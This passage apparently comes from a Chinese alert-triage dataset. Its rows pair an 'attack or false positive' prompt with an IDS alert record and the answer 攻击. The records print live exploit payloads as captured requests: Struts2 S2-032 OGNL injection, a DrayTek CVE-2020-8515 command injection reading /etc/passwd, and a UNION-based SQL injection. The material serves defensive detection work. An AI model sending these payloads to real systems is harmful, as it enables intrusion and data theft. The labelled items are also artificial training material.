"R0VUIC8/bWV0aG9kOiUyM19tZW1iZXJBY2Nlc3MlM2RAb2dubC5PZ25sQ29udGV4dEBERUZBVUxUX01FTUJFUl9BQ0NFU1MsJTIzY29udGV4dFslMjNwYXJhbWV0ZXJzLm9ialswXV0uZ2V0V3JpdGVyKCkucHJpbnQoNDAyNzYqNDI0NzYpLDE/JTIzeHg6JTIzcmVxdWVzdC50b1N0cmluZyZvYmo9Y29tLm9wZW5zeW1waG9ueS54d29yazIuZGlzcGF0Y2hlci5IdHRwU2VydmxldFJlc3BvbnNlIEhUVFAvMS4xDQpIb3N0OiAyMTguNzYuMTUuNTY6MzAwMDENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IHJ2Ojc4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzguMA0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjkNCkRudDogMQ0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg==", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_8e788e273d03561dceb9120e3da7fc72", "access_time": "2024-11-27 14:16:24", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16030000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "223.160.174.104", "dimension": "3", "url_path": "/", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23context[%23parameters.obj[0]].getWriter().print(40276*42476),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "obj": "com.opensymphony.xwork2.dispatcher.HttpServletResponse", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268567863-Java框架通用代码执行攻击", "rule_labels": "{\"0x110700\": {\"parent_name\": \"\", \"type\": \"\", \"name\": \"二次访问分析\", \"parent_id\": \"0\", \"proto\": \"TCP\"}, \"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12503", "h_url": "/?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23context[%23parameters.obj[0]].getWriter().print(40276*42476),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688184", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "命令执行", "_origin": {"write_date": 1732688184, "vuln_harm": "可被攻击者用来执行任意命令,写入后门等,进而完全控制服务器,危害巨大。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.68.194", "site_app": "", "hit_end": 26, "uri": "/?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23context[%23parameters.obj[0]].getWriter().print(40276*42476),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse", "dport": 30001, "vuln_name": "Struts2-032命令执行漏洞(CVE-2016-3081)", "rsp_status": 0, "code_language": "", "solution": "1、禁用动态方法调用:\r\n\r\n修改 Struts2 的配置文件,将“struts.enable.DynamicMethodInvocation” 设置为false,如\r\n\r\n<constant name=”struts.enable.DynamicMethodInvocation”value=”false”/>;\r\n\r\n2、如条件允许前提下,可升级Struts版本至Struts 2.3.20.2,Struts 2.3.24.2或者Struts 2.3.28.1来修复漏洞,新版本下载地址:https://struts.apache.org/download.cgi#struts2328。", "hit_start": 6, "detail_info": "发现攻击者正在目标站点利用代码执行漏洞执行系统命令。命令执行漏洞是指代码未对用户可控参数做过滤,导致直接带入执行命令的代码中,对恶意构造的语句,可被用来执行任意命令。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "发现攻击者正在目标站点利用代码执行漏洞执行系统命令。命令执行漏洞是指代码未对用户可控参数做过滤,导致直接带入执行命令的代码中,对恶意构造的语句,可被用来执行任意命令。", "public_date": "2023-03-31 14:45:31", "sport": 12503}, "detail_info": "发现攻击者正在目标站点利用代码执行漏洞执行系统命令。命令执行漏洞是指代码未对用户可控参数做过滤,导致直接带入执行命令的代码中,对恶意构造的语句,可被用来执行任意命令。", "file_md5": "", "rule_key": "webids", "api": "218.76.15.56:30001/", "first_access_time": "2024-11-27 14:16:24", "hazard_level": "8", "hazard_rating": "危急", "hit_field": "req_header", "h_method": "GET", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "Struts2-032命令执行漏洞(CVE-2016-3081)", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "2b6dd8b3448673854e4bfe76088f41d0", "xff": "", "vuln_desc": "发现攻击者正在目标站点利用代码执行漏洞执行系统命令。命令执行漏洞是指代码未对用户可控参数做过滤,导致直接带入执行命令的代码中,对恶意构造的语句,可被用来执行任意命令。", "attack_chain": "0x02010000", "vuln_harm": "可被攻击者用来执行任意命令,写入后门等,进而完全控制服务器,危害巨大。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688165", "code_language": "", "public_date": "2023-03-31 14:45:31", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "26", "h_proto_version": "HTTP/1.1", "uri": "/?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23context[%23parameters.obj[0]].getWriter().print(40276*42476),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020796", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "Struts2-032命令执行漏洞(CVE-2016-3081)", "attack_type": "命令执行", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1、禁用动态方法调用:\r\n\r\n修改 Struts2 的配置文件,将“struts.enable.DynamicMethodInvocation” 设置为false,如\r\n\r\n<constant name=”struts.enable.DynamicMethodInvocation”value=”false”/>;\r\n\r\n2、如条件允许前提下,可升级Struts版本至Struts 2.3.20.2,Struts 2.3.24.2或者Struts 2.3.28.1来修复漏洞,新版本下载地址:https://struts.apache.org/download.cgi#struts2328。", "hit_start": "6", "skyeye_id": "", "payload": {"req_header": "R0VUIC8/bWV0aG9kOiUyM19tZW1iZXJBY2Nlc3MlM2RAb2dubC5PZ25sQ29udGV4dEBERUZBVUxUX01FTUJFUl9BQ0NFU1MsJTIzY29udGV4dFslMjNwYXJhbWV0ZXJzLm9ialswXV0uZ2V0V3JpdGVyKCkucHJpbnQoNDAyNzYqNDI0NzYpLDE/JTIzeHg6JTIzcmVxdWVzdC50b1N0cmluZyZvYmo9Y29tLm9wZW5zeW1waG9ueS54d29yazIuZGlzcGF0Y2hlci5IdHRwU2VydmxldFJlc3BvbnNlIEhUVFAvMS4xDQpIb3N0OiAyMTguNzYuMTUuNTY6MzAwMDENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IHJ2Ojc4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzguMA0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjkNCkRudDogMQ0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg==", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_15363813a711ae5320b8f50cbc83dac1", "access_time": "2024-11-27 14:16:24", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16090000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "223.160.174.104", "dimension": "3", "url_path": "/", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23context[%23parameters.obj[0]].getWriter().print(40276*42476),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "obj": "com.opensymphony.xwork2.dispatcher.HttpServletResponse", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268568470-Struts2-032命令执行漏洞(CVE-2016-3081)", "rule_labels": "{\"0x110700\": {\"parent_name\": \"\", \"type\": \"\", \"name\": \"二次访问分析\", \"parent_id\": \"0\", \"proto\": \"TCP\"}, \"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12503", "h_url": "/?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23context[%23parameters.obj[0]].getWriter().print(40276*42476),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688182", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "命令执行", "_origin": {"write_date": 1732688182, "vuln_harm": "任何未经授权的远程攻击者都可以利用此次涉及的0day漏洞在系统上注入并执行任意命令", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.23.68.194", "site_app": "", "hit_end": 11, "uri": "/cgi-bin/mainfunction.cgi", "dport": 30001, "vuln_name": "DrayTek远程命令执行漏洞(CVE-2020-8515)", "rsp_status": 0, "code_language": "其他", "solution": "DrayTek已经对漏洞发布了安全更新,更新连接https://www.draytek.com/support/latest-firmwares/", "hit_start": 0, "detail_info": "台湾企业DrayTek生产的企业级网络设备存在0day漏洞,这些漏洞影响DrayTek Vigor企业交换机、负载平衡器、路由器和VPN网关设备,任何未经授权的远程攻击者都可以利用此次涉及的0day漏洞在系统上注入并执行任意命令。\r\n受影响的固件版本列表如下:\r\nVigor2960 <v1.5.1\r\nVigor300B <v1.5.1\r\nVigor3900 <v1.5.1\r\nVigorSwitch20P2121 <= v2.3.2\r\nVigorSwitch20G1280 <= v2.3.2\r\nVigorSwitch20P1280 <= v2.3.2\r\nVigorSwitch20G2280 <= v2.3.2\r\nVigorSwitch20P2280 <= v2.3.2", "xff": "", "sip": "223.160.174.104", "vuln_desc": "台湾企业DrayTek生产的企业级网络设备存在0day漏洞,这些漏洞影响DrayTek Vigor企业交换机、负载平衡器、路由器和VPN网关设备,任何未经授权的远程攻击者都可以利用此次涉及的0day漏洞在系统上注入并执行任意命令。\r\n受影响的固件版本列表如下:\r\nVigor2960 <v1.5.1\r\nVigor300B <v1.5.1\r\nVigor3900 <v1.5.1\r\nVigorSwitch20P2121 <= v2.3.2\r\nVigorSwitch20G1280 <= v2.3.2\r\nVigorSwitch20P1280 <= v2.3.2\r\nVigorSwitch20G2280 <= v2.3.2\r\nVigorSwitch20P2280 <= v2.3.2", "public_date": "2020-03-30 14:53:28", "sport": 12522}, "detail_info": "台湾企业DrayTek生产的企业级网络设备存在0day漏洞,这些漏洞影响DrayTek Vigor企业交换机、负载平衡器、路由器和VPN网关设备,任何未经授权的远程攻击者都可以利用此次涉及的0day漏洞在系统上注入并执行任意命令。\r\n受影响的固件版本列表如下:\r\nVigor2960 <v1.5.1\r\nVigor300B <v1.5.1\r\nVigor3900 <v1.5.1\r\nVigorSwitch20P2121 <= v2.3.2\r\nVigorSwitch20G1280 <= v2.3.2\r\nVigorSwitch20P1280 <= v2.3.2\r\nVigorSwitch20G2280 <= v2.3.2\r\nVigorSwitch20P2280 <= v2.3.2", "file_md5": "480b54eadc21b78e20b1d7e5e118083c", "action": "login", "rule_key": "webids", "api": "218.76.15.56:30001/cgi-bin/mainfunction.cgi", "loginuser": "a", "first_access_time": "2024-11-27 14:16:22", "hazard_level": "8", "hazard_rating": "危急", "hit_field": "req_body", "h_method": "POST", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "DrayTek远程命令执行漏洞(CVE-2020-8515)", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "4b6512ad088530f763fd2baeca448df7", "xff": "", "vuln_desc": "台湾企业DrayTek生产的企业级网络设备存在0day漏洞,这些漏洞影响DrayTek Vigor企业交换机、负载平衡器、路由器和VPN网关设备,任何未经授权的远程攻击者都可以利用此次涉及的0day漏洞在系统上注入并执行任意命令。\r\n受影响的固件版本列表如下:\r\nVigor2960 <v1.5.1\r\nVigor300B <v1.5.1\r\nVigor3900 <v1.5.1\r\nVigorSwitch20P2121 <= v2.3.2\r\nVigorSwitch20G1280 <= v2.3.2\r\nVigorSwitch20P1280 <= v2.3.2\r\nVigorSwitch20G2280 <= v2.3.2\r\nVigorSwitch20P2280 <= v2.3.2", "attack_chain": "0x02020000", "vuln_harm": "任何未经授权的远程攻击者都可以利用此次涉及的0day漏洞在系统上注入并执行任意命令", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688162", "code_language": "其他", "public_date": "2020-03-30 14:53:28", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "11", "h_proto_version": "HTTP/1.1", "uri": "/cgi-bin/mainfunction.cgi", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020858", "keypath": "%27%0A%2fbin%2fcat${IFS}%2f/etc/passwd%26id%26pwd", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "DrayTek远程命令执行漏洞(CVE-2020-8515)", "attack_type": "命令执行", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "DrayTek已经对漏洞发布了安全更新,更新连接https://www.draytek.com/support/latest-firmwares/", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvY2dpLWJpbi9tYWluZnVuY3Rpb24uY2dpIEhUVFAvMS4xDQpIb3N0OiAyMTguNzYuMTUuNTY6MzAwMDENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IHJ2Ojc4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzguMA0KQ29udGVudC1MZW5ndGg6IDkzDQpBY2NlcHQ6ICovKg0KQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOQ0KQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluOyBjaGFyc2V0PVVURi04DQpEbnQ6IDENClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDENCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=", "req_body": "YWN0aW9uPWxvZ2luJmtleVBhdGg9JTI3JTBBJTJmYmluJTJmY2F0JHtJRlN9JTJmL2V0Yy9wYXNzd2QlMjZpZCUyNnB3ZCZsb2dpblVzZXI9YSZsb2dpblB3ZD1h", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "loginpwd": "a", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_984cb57384eac05245c9dc57a3c50169", "access_time": "2024-11-27 14:16:22", "content-length": "93", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16090000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "text/plain; charset=UTF-8", "sip": "223.160.174.104", "dimension": "3", "url_path": "/cgi-bin/mainfunction.cgi", "src_mac": "00:94:a1:5e:6e:87", "file_name": "mainfunction.cgi", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /cgi-bin/mainfunction.cgi HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nContent-Length: 93\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nContent-Type: text/plain; charset=UTF-8\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2f/etc/passwd%26id%26pwd&loginUser=a&loginPwd=a", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268568664-DrayTek远程命令执行漏洞(CVE-2020-8515)", "rule_labels": "{\"0x110700\": {\"parent_name\": \"\", \"type\": \"\", \"name\": \"二次访问分析\", \"parent_id\": \"0\", \"info\": \"nction.cg\", \"proto\": \"DNS\"}, \"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12522", "h_url": "/cgi-bin/mainfunction.cgi"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688179", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "SQL注入", "_origin": {"write_date": 1732688179, "vuln_harm": "被SQL注入后可能导致以下后果: 1.网页被篡改; 2.数据被篡改; 3.核心数据被窃取; 4.数据库所在服务器被攻击变成傀儡主机。", "rule_version_str": "3.0.1122.14572", "hit_field": "", "dip": "172.23.68.194", "site_app": "", "hit_end": 0, "uri": "/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1%27%20union%20select%20(select+SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES(%27MD5%27,%27830294251%27)),3,32)),null,null,null,null,null,null,null,null,null,null--", "dport": 30001, "vuln_name": "SQL注入攻击(机器学习)", "rsp_status": 0, "code_language": "", "solution": "如下一些方法能够防止注入攻击:\r\n\r\n1.在网页代码中需要对用户输入的数据进行严格过滤;\r\n\r\n2.部署Web应用防火墙;\r\n\r\n3.对数据库操作进行监控建议过滤用户输入的数据,切记用户的所有输入都要认为是不安全的。", "hit_start": 0, "detail_info": "SQL注入攻击(机器学习)\r\nSQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "SQL注入攻击(机器学习)\r\nSQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "public_date": "2020-11-25 19:52:52", "sport": 12499}, "detail_info": "SQL注入攻击(机器学习)\r\nSQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "file_md5": "71ccacd67320f2729d33d1d79ce0cd95", "rule_key": "webids", "api": "218.76.15.56:30001/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp", "documentid": "1' union select (select+SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','830294251')),3,32)),null,null,null,null,null,null,null,null,null,null--", "first_access_time": "2024-11-27 14:16:19", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "", "h_method": "GET", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "SQL注入攻击(机器学习)", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "efbace0eafbf2e5a2781c945546f4ebc", "xff": "", "vuln_desc": "SQL注入攻击(机器学习)\r\nSQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "attack_chain": "0x02020000", "vuln_harm": "被SQL注入后可能导致以下后果: 1.网页被篡改; 2.数据被篡改; 3.核心数据被窃取; 4.数据库所在服务器被攻击变成傀儡主机。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688158", "code_language": "", "public_date": "2020-11-25 19:52:52", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "0", "h_proto_version": "HTTP/1.1", "uri": "/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1%27%20union%20select%20(select+SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES(%27MD5%27,%27830294251%27)),3,32)),null,null,null,null,null,null,null,null,null,null--", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020b69", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "SQL注入攻击(机器学习)", "attack_type": "SQL注入", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "如下一些方法能够防止注入攻击:\r\n\r\n1.在网页代码中需要对用户输入的数据进行严格过滤;\r\n\r\n2.部署Web应用防火墙;\r\n\r\n3.对数据库操作进行监控建议过滤用户输入的数据,切记用户的所有输入都要认为是不安全的。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "R0VUIC9kZWZhdWx0cm9vdC9pV2ViT2ZmaWNlU2lnbi9PZmZpY2VTZXJ2ZXIuanNwLy4uLy4uL3B1YmxpYy9pU2lnbmF0dXJlSFRNTC5qc3AvRG9jdW1lbnRFZGl0LmpzcD9Eb2N1bWVudElEPTElMjclMjB1bmlvbiUyMHNlbGVjdCUyMChzZWxlY3QrU1VCU1RSSU5HKHN5cy5mbl9zcWx2YXJiYXNldG9zdHIoSEFTSEJZVEVTKCUyN01ENSUyNywlMjc4MzAyOTQyNTElMjcpKSwzLDMyKSksbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbC0tIEhUVFAvMS4xDQpIb3N0OiAyMTguNzYuMTUuNTY6MzAwMDENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IHJ2Ojc4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzguMA0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjkNCkRudDogMQ0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg==", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_a20155a2ceb590a9587b7f2918bd70cd", "access_time": "2024-11-27 14:16:19", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16010000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "223.160.174.104", "dimension": "3", "url_path": "/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp", "src_mac": "00:94:a1:5e:6e:87", "file_name": "DocumentEdit.jsp", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1%27%20union%20select%20(select+SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES(%27MD5%27,%27830294251%27)),3,32)),null,null,null,null,null,null,null,null,null,null-- HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268569449-SQL注入攻击(机器学习)", "rule_labels": "{}", "sport": "12499", "h_url": "/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1%27%20union%20select%20(select+SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES(%27MD5%27,%27830294251%27)),3,32)),null,null,null,null,null,null,null,null,null,null--"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688178", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "SQL注入", "_origin": {"write_date": 1732688178, "vuln_harm": "被SQL注入后可能导致以下后果: 1.网页被篡改; 2.数据被篡改; 3.核心数据被窃取; 4.数据库所在服务器被攻击变成傀儡主机。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.68.194", "site_app": "其他", "hit_end": 123, "uri": "/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1%27%20union%20select%20(select+SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES(%27MD5%27,%27830294251%27)),3,32)),null,null,null,null,null,null,null,null,null,null--", "dport": 30001, "vuln_name": "SQL注入攻击", "rsp_status": 0, "code_language": "其他", "solution": "如下一些方法能够防止注入攻击:\r\n1.在网页代码中需要对用户输入的数据进行严格过滤;\r\n2.部署Web应用防火墙;\r\n3.对数据库操作进行监控建议过滤用户输入的数据,切记用户的所有输入都要认为是不安全的。", "hit_start": 103, "detail_info": "SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "public_date": "2018-08-08 12:00:00", "sport": 12499}, "detail_info": 